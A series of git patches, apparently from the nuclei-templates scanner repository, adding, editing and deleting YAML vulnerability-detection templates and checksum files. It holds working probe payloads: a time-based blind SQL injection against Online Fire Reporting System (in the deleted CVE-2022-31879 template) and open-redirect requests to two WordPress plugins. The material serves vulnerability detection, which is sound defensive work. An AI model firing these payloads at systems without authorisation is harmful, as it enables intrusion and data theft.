458d81c12ae71a4be0792a823c947ed13fc7fb78 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 9 Jun 2024 22:13:40 +0000 Subject: [PATCH 0082/1841] Auto Generated New Template Addition List [Sun Jun 9 22:13:40 UTC 2024] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index 570f70033f..8a07a01e1b 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1 @@ -http/cves/2024/CVE-2024-4577.yaml +http/cves/2023/CVE-2023-38194.yaml From d29f558671df0c83cc10b75e08e83e323bc11c8a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 22:13:49 +0000 Subject: [PATCH 0083/1841] Auto Generated Templates Checksum [Sun Jun 9 22:13:49 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 16332ee3b1..fb200cf1a5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:ad31a3900ed4d39f7021d78dc0372290accfc1bc +README.md:fd5611cd2a074075a7b62aa87ea892cef36731e8 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:4ba5810b3ed18d96142d1e6001395674ce2ec334 -TEMPLATES-STATS.md:c8d67b997860d489ea1c6fa3ced489f775541b8c -TOP-10.md:83cb75ab6007e6212c71f3156a91e4c7756a08fc +TEMPLATES-STATS.json:252ce84d9a78b8aa2f3c37a797658c62a96f4ab1 +TEMPLATES-STATS.md:492c7a2b30ad732f7cd5d8aa33b7def55b4b4213 +TOP-10.md:e6fbef9828cd278fee8b66c9a7f4754a6a724db6 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 @@ -3107,6 +3107,7 @@ http/cves/2023/CVE-2023-37679.yaml:3fd1560c8134ad5beee7f4c91164a5c38c28dbc8 http/cves/2023/CVE-2023-37728.yaml:00598b29b4b89548b3276da06fbb24bd84c3a748 http/cves/2023/CVE-2023-37979.yaml:3542eab145a3bbe02375368006db5afcbb8c76ca http/cves/2023/CVE-2023-38035.yaml:7e13653ba8b1089d2977bcd24d92a81f5d7e52ae +http/cves/2023/CVE-2023-38194.yaml:e63fb9c5552db676c374d280afa6b2bccff97c05 http/cves/2023/CVE-2023-38203.yaml:16b0b5592d81b145e4e8b1e4bb06bd3e576a2bd6 http/cves/2023/CVE-2023-38205.yaml:e5782f68bf9504ca476f12a4ee99b0ce2f78d5aa http/cves/2023/CVE-2023-3836.yaml:4fe6de4aaf6582ae8ad412a8f5c7c1d99765a416 @@ -3321,7 +3322,7 @@ http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 -http/cves/2024/CVE-2024-4577.yaml:7c1c1f4928d95b4456a8ee14fbaa4d810bbe5bc4 +http/cves/2024/CVE-2024-4577.yaml:49a82779ce078bf9c241e31faf143cebf86af1eb http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 @@ -8633,7 +8634,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9205018ec81e36734a66ab900241a9e4fc233acb +templates-checksum.txt:4f09a5cf826b202e973575abecf536da5c3d8e3e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c9b8b78767425a37b04858bae40cd7ef24f67308 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 9 Jun 2024 22:14:44 +0000 Subject: [PATCH 0084/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 96299453af..e7941ad5d2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,7 +3,7 @@ on: push: paths: - '.new-additions' - - 'http/cves/2024/CVE-2024-4577.yaml' + - 'http/cves/2023/CVE-2023-38194.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 95e2cf79ffb0ff1fa9b44b559417378de361c420 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 22:15:35 +0000 Subject: [PATCH 0085/1841] Auto Template Signing [Sun Jun 9 22:15:35 UTC 2024] :robot: --- http/cves/2023/CVE-2023-38194.yaml | 1 + http/cves/2024/CVE-2024-4577.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-38194.yaml b/http/cves/2023/CVE-2023-38194.yaml index 1641b0cac6..46dad2ac69 100644 --- a/http/cves/2023/CVE-2023-38194.yaml +++ b/http/cves/2023/CVE-2023-38194.yaml @@ -43,3 +43,4 @@ http: - 'contains(header_2, "text/html")' - 'status_code_2 == 200' condition: and +# digest: 4a0a004730450221009a1a97d60d7b7c57df8826164505d09ec5c7d5cc478cb403655ef61e1ebd1ecc02203aa006f1ef4aa619fc4a2cc86edf00014ad8c66b585e5d1d8e98faa109232263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index c8644791dc..0a012537a7 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -31,4 +31,4 @@ http: part: body words: - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a" -# digest: 4a0a0047304502202f2c58605604d971b9179343f2f392f5b017faff6fc579a6174baa96cc2bccdd0221008d95bd2cfed96674e0cb86a73bcb16796d8d5a4910d661d7d088a5b4c14adec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fa123f840251c7d30f07c01212f37b7717cae9b5 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 10 Jun 2024 14:52:00 +0300 Subject: [PATCH 0086/1841] add cve-2023-6505 --- http/cves/2023/CVE-2023-6505.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6505.yaml diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml new file mode 100644 index 0000000000..53a0b8dbf1 --- /dev/null +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-6505 + +info: + name: Prime Mover < 1.9.3 - Directory Listing to Sensitive Data Exposure + author: securityforeveryone.com + severity: high + description: | + Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes. + remediation: Fixed in 1.9.3 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-6505 + - https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629 + - https://research.cleantalk.org/cve-2023-6505-prime-mover-poc-exploit/ + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-6505 + epss-score: 0.00087 + epss-percentile: 0.36916 + cpe: cpe:2.3:a:codexonics:prime_mover:*:*:*:*:*:wordpress:*:* + metadata: + vendor: codexonics + product: prime_mover + framework: wordpress + tags: wpscan,wordpress,exposure,cve,cve2023 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Index of /wp-content/uploads/prime-mover-export-files/1' + - '.wprime' + condition: or + part: body + + - type: status + status: + - 200 From cbf4d6001edcaee2404da05ecefdf99ba7452a4d Mon Sep 17 00:00:00 2001 From: Kristinn Vikar Date: Mon, 10 Jun 2024 12:11:02 +0000 Subject: [PATCH 0087/1841] Teros match cookie specifically --- http/technologies/waf-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index a708bd08fa..9dbfc5f527 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -74,9 +74,9 @@ http: - type: regex name: teros regex: - - '(?i)st8(id|.wa|.wf)?.?(\d+|\w+)?' + - '(?i)st8(id|.wa|.wf)?.?(\d+|\w+)?=' condition: or - part: response + part: header - type: regex name: stricthttp From 90715904202eaf640be3edde51ed4dbb3b2872e8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 10 Jun 2024 22:35:24 +0530 Subject: [PATCH 0088/1841] Delete http/cves/2022/CVE-2022-31879.yaml --- http/cves/2022/CVE-2022-31879.yaml | 51 ------------------------------ 1 file changed, 51 deletions(-) delete mode 100644 http/cves/2022/CVE-2022-31879.yaml diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml deleted file mode 100644 index 65e844b0f9..0000000000 --- a/http/cves/2022/CVE-2022-31879.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-31879 - -info: - name: Online Fire Reporting System v1.0 - SQL injection - author: theamanrawat,j4vaovo - severity: high - description: | - Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. - reference: - - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting - - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31879 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-31879 - cwe-id: CWE-89 - epss-score: 0.05371 - epss-percentile: 0.93099 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: online_fire_reporting_system_project - product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project - -http: - - raw: - - | - @timeout: 15s - GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1 - Host: {{Hostname}} - - | - @timeout: 15s - GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 200 && status_code_2 == 200' - - 'duration_2 - duration_1 >= 7' - - 'contains(content_type_2, "text/html")' - - 'contains(body_2, "Dashboard")' - condition: and -# digest: 4b0a00483046022100813a074dda781c0eac1c568a26f0ba914c29ec80c80fa7735148e7af57dc3cd0022100ec9b4331c556899825042e75cb937f5db6dd4b0c2a8166e17e3d466a2ac11256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e65dc0b3f2c2acf5ad676abf32e677a1b57d7053 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 10 Jun 2024 23:16:24 +0300 Subject: [PATCH 0089/1841] CVE-2023-6786 add --- http/cves/2023/CVE-2023-6786.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6786.yaml diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml new file mode 100644 index 0000000000..e270f37c16 --- /dev/null +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -0,0 +1,26 @@ +id: CVE-2023-6786 +info: + name: Payment Gateway for Telcell < 2.0.4 - Open Redirect + author: securityforeveryone.com + severity: medium + description: | + The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue + remediation: Fixed in 2.0.4 + reference: + - https://wpscan.com/vulnerability/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2/ + metadata: + publicwww-query: inurl:"/wp-content/plugins/payment-gateway-for-telcell + tags: wpscan,wordpress,redirect,wp-plugin,cve,cve2023 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me" + + redirects: true + max-redirects: 2 + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' From 3b72e56792a8b4057f8b72a9fdacd912a340508f Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 10 Jun 2024 23:19:15 +0300 Subject: [PATCH 0090/1841] add CVE-2024-0250 --- http/cves/2024/CVE-2024-0250.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0250.yaml diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml new file mode 100644 index 0000000000..d7d71c2599 --- /dev/null +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -0,0 +1,31 @@ +id: CVE-2024-0250 +info: + name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect + author: securityforeveryone.com + severity: medium + description: | + The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + remediation: Fixed in 6.3 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-0250 + - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/ + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + publicwww-query: inurl:"/wp-content/plugins/analytics-insights + tags: wpscan,redirect,oauth,wp-plugin,cve,cve2024 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x" + + redirects: true + max-redirects: 2 + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' From 0a8efa723f228af4ce8ed8a3dda8c75818243ee3 Mon Sep 17 00:00:00 2001 From: dcruzec Date: Mon, 10 Jun 2024 23:04:14 -0400 Subject: [PATCH 0091/1841] Add files via upload --- ...veeam-backup-enterprise-manager-login.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/veeam-backup-enterprise-manager-login.yaml diff --git a/http/exposed-panels/veeam-backup-enterprise-manager-login.yaml b/http/exposed-panels/veeam-backup-enterprise-manager-login.yaml new file mode 100644 index 0000000000..77baa983a0 --- /dev/null +++ b/http/exposed-panels/veeam-backup-enterprise-manager-login.yaml @@ -0,0 +1,31 @@ +id: veeam-backup-enterprise-manager-login + +info: + name: Veeam Backup Enterprise Manager Login - Detect + author: Charles D + severity: info + description: Veeam Backup Enterprise Manager Login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cve-id: CWE-200 + metadata: + max-request: 1 + shodan-query: title:"veeam backup enterprise manager" + tags: veeam, panel, enterprise-manager + +http: + - method: GET + path: + - "{{BaseURL}}/login.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Veeam Backup Enterprise Manager" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 04db84b48adc91bdf1251adec2c04431611d0140 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 07:54:29 +0000 Subject: [PATCH 0093/1841] Auto Generated Templates Checksum [Tue Jun 11 07:54:29 UTC 2024] :robot: --- templates-checksum.txt | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fb200cf1a5..0991629cb3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2687,7 +2687,6 @@ http/cves/2022/CVE-2022-31845.yaml:ec3fe5cef35c14a3b17bfc74394a8526541a69a6 http/cves/2022/CVE-2022-31846.yaml:0f8b63bac39ca1c09d571aba5e699ed957872cac http/cves/2022/CVE-2022-31847.yaml:da369cafe875e0fc818b4606871854c77f11511b http/cves/2022/CVE-2022-31854.yaml:365c4ced58a37e3d0f041bab452270ada3fc3a3a -http/cves/2022/CVE-2022-31879.yaml:cf56507b017fd380640d0260a4b002f977f727f7 http/cves/2022/CVE-2022-31974.yaml:6711ff86f730445184c93c2a91a32daf2af56723 http/cves/2022/CVE-2022-31975.yaml:1d80466a8bfedc02bacb9b870793a036d0769a40 http/cves/2022/CVE-2022-31976.yaml:e6c75f79cbfb04defaea59a859cfbda40ba39dc4 @@ -3107,7 +3106,7 @@ http/cves/2023/CVE-2023-37679.yaml:3fd1560c8134ad5beee7f4c91164a5c38c28dbc8 http/cves/2023/CVE-2023-37728.yaml:00598b29b4b89548b3276da06fbb24bd84c3a748 http/cves/2023/CVE-2023-37979.yaml:3542eab145a3bbe02375368006db5afcbb8c76ca http/cves/2023/CVE-2023-38035.yaml:7e13653ba8b1089d2977bcd24d92a81f5d7e52ae -http/cves/2023/CVE-2023-38194.yaml:e63fb9c5552db676c374d280afa6b2bccff97c05 +http/cves/2023/CVE-2023-38194.yaml:2ec9219a1e1b905d53b9e70add4053e681f142e1 http/cves/2023/CVE-2023-38203.yaml:16b0b5592d81b145e4e8b1e4bb06bd3e576a2bd6 http/cves/2023/CVE-2023-38205.yaml:e5782f68bf9504ca476f12a4ee99b0ce2f78d5aa http/cves/2023/CVE-2023-3836.yaml:4fe6de4aaf6582ae8ad412a8f5c7c1d99765a416 @@ -3322,7 +3321,7 @@ http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 -http/cves/2024/CVE-2024-4577.yaml:49a82779ce078bf9c241e31faf143cebf86af1eb +http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 @@ -8634,7 +8633,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4f09a5cf826b202e973575abecf536da5c3d8e3e +templates-checksum.txt:509100267f6987484ecd16418331c37dc006db7f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From db3c1bdca3ffe35f6e3386714f919522b0b7327b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 13:31:38 +0530 Subject: [PATCH 0094/1841] updated matcher & id --- ...r-login.yaml => veeam-backup-manager-login.yaml} | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) rename http/exposed-panels/{veeam-backup-enterprise-manager-login.yaml => veeam-backup-manager-login.yaml} (67%) diff --git a/http/exposed-panels/veeam-backup-enterprise-manager-login.yaml b/http/exposed-panels/veeam-backup-manager-login.yaml similarity index 67% rename from http/exposed-panels/veeam-backup-enterprise-manager-login.yaml rename to http/exposed-panels/veeam-backup-manager-login.yaml index 77baa983a0..9cd6fce998 100644 --- a/http/exposed-panels/veeam-backup-enterprise-manager-login.yaml +++ b/http/exposed-panels/veeam-backup-manager-login.yaml @@ -1,17 +1,19 @@ -id: veeam-backup-enterprise-manager-login +id: veeam-backup-manager-login info: name: Veeam Backup Enterprise Manager Login - Detect author: Charles D severity: info - description: Veeam Backup Enterprise Manager Login + description: | + Veeam Backup Enterprise Manager Login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cve-id: CWE-200 metadata: max-request: 1 + verified: true shodan-query: title:"veeam backup enterprise manager" - tags: veeam, panel, enterprise-manager + tags: veeam,panel,enterprise-manager,login,detect http: - method: GET @@ -23,9 +25,8 @@ http: - type: word part: body words: - - "Veeam Backup Enterprise Manager" - condition: and + - "Veeam Backup Enterprise Manager : Login" - type: status status: - - 200 \ No newline at end of file + - 200 From 3f7646380417a2272a7311fd1cb03069b4cdd991 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 14:12:03 +0530 Subject: [PATCH 0095/1841] updated matchers, id & extractor --- http/exposed-panels/nperf-detect.yaml | 30 ---------------- http/technologies/nperf-server-detect.yaml | 40 ++++++++++++++++++++++ 2 files changed, 40 insertions(+), 30 deletions(-) delete mode 100644 http/exposed-panels/nperf-detect.yaml create mode 100644 http/technologies/nperf-server-detect.yaml diff --git a/http/exposed-panels/nperf-detect.yaml b/http/exposed-panels/nperf-detect.yaml deleted file mode 100644 index 872bacea08..0000000000 --- a/http/exposed-panels/nperf-detect.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: nperf-web-console - -info: - name: nperf Panel - Detect - author: rxerium - severity: info - description: A nperf panel was detected. - reference: - - https://www.nperf.com - metadata: - verified: true - max-request: 1 - shodan-query: product:"nPerf" - tags: panel - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "nPerfServer" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/http/technologies/nperf-server-detect.yaml b/http/technologies/nperf-server-detect.yaml new file mode 100644 index 0000000000..10315c5df7 --- /dev/null +++ b/http/technologies/nperf-server-detect.yaml @@ -0,0 +1,40 @@ +id: nperf-server-detect + +info: + name: nPerf Server - Detect + author: rxerium + severity: info + description: | + A nperf panel was detected. + reference: + - https://www.nperf.com + metadata: + verified: true + max-request: 1 + shodan-query: product:"nPerf" + tags: tech,nperf,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "nPerfServer" + + - type: word + part: header + words: + - "Nperfserver-Remote-Endpoint" + - "nPerf/" + condition: or + + extractors: + - type: kval + part: header + kval: + - Server From d92ab2fb9f4878219e061cc9e741c5c36ff353fd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 14:34:36 +0530 Subject: [PATCH 0096/1841] updated matcher, id & metadata --- http/exposed-panels/wildix-detect.yaml | 27 ---------------- .../wildix-collaboration-panel.yaml | 32 +++++++++++++++++++ 2 files changed, 32 insertions(+), 27 deletions(-) delete mode 100644 http/exposed-panels/wildix-detect.yaml create mode 100644 http/technologies/wildix-collaboration-panel.yaml diff --git a/http/exposed-panels/wildix-detect.yaml b/http/exposed-panels/wildix-detect.yaml deleted file mode 100644 index 522312bb9d..0000000000 --- a/http/exposed-panels/wildix-detect.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: wildix-login-detect - -info: - name: wildix Login Panel - Detect - author: rxerium - severity: info - description: wildix login panel was detected. - reference: - - https://www.wildix.com/product/collaboration-ucc-platform/# - classification: - cwe-id: CWE-200 - tags: panel,login - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - "Wildix Collaboration" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/http/technologies/wildix-collaboration-panel.yaml b/http/technologies/wildix-collaboration-panel.yaml new file mode 100644 index 0000000000..538728ea45 --- /dev/null +++ b/http/technologies/wildix-collaboration-panel.yaml @@ -0,0 +1,32 @@ +id: wildix-collaboration-panel + +info: + name: Wildix Collaboration Panel - Detect + author: rxerium + severity: info + description: | + Wildix Collaboration login panel was detected. + reference: + - https://www.wildix.com/product/collaboration-ucc-platform/# + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-1295577382 + tags: panel,login,wildix,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers: + - type: word + part: server + words: + - "wildix" From e48160ee64c1bb913f225e69abe3de765b1ee369 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 14:42:09 +0530 Subject: [PATCH 0097/1841] updated info --- http/cves/2024/CVE-2024-0250.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml index d7d71c2599..80308bfbcf 100644 --- a/http/cves/2024/CVE-2024-0250.yaml +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -1,29 +1,32 @@ id: CVE-2024-0250 + info: name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect author: securityforeveryone.com severity: medium description: | The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. - remediation: Fixed in 6.3 + remediation: | + Fixed in 6.3 reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-0250 - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/ - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-0250 classification: epss-score: 0.00043 epss-percentile: 0.0866 metadata: - publicwww-query: inurl:"/wp-content/plugins/analytics-insights - tags: wpscan,redirect,oauth,wp-plugin,cve,cve2024 + max-request: 1 + verified: true + fofa-query: body="/wp-content/plugins/analytics-insights" + publicwww-query: "/wp-content/plugins/analytics-insights" + tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x" - redirects: true - max-redirects: 2 matchers: - type: regex part: header From f84d3ab6b3834ae713a83e3d15f3d3f95b1ca4da Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 14:52:25 +0530 Subject: [PATCH 0098/1841] updated info --- http/cves/2023/CVE-2023-6786.yaml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml index e270f37c16..cd16ae440f 100644 --- a/http/cves/2023/CVE-2023-6786.yaml +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -1,24 +1,29 @@ id: CVE-2023-6786 + info: name: Payment Gateway for Telcell < 2.0.4 - Open Redirect author: securityforeveryone.com severity: medium description: | The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue - remediation: Fixed in 2.0.4 + remediation: | + Fixed in 2.0.4 reference: - 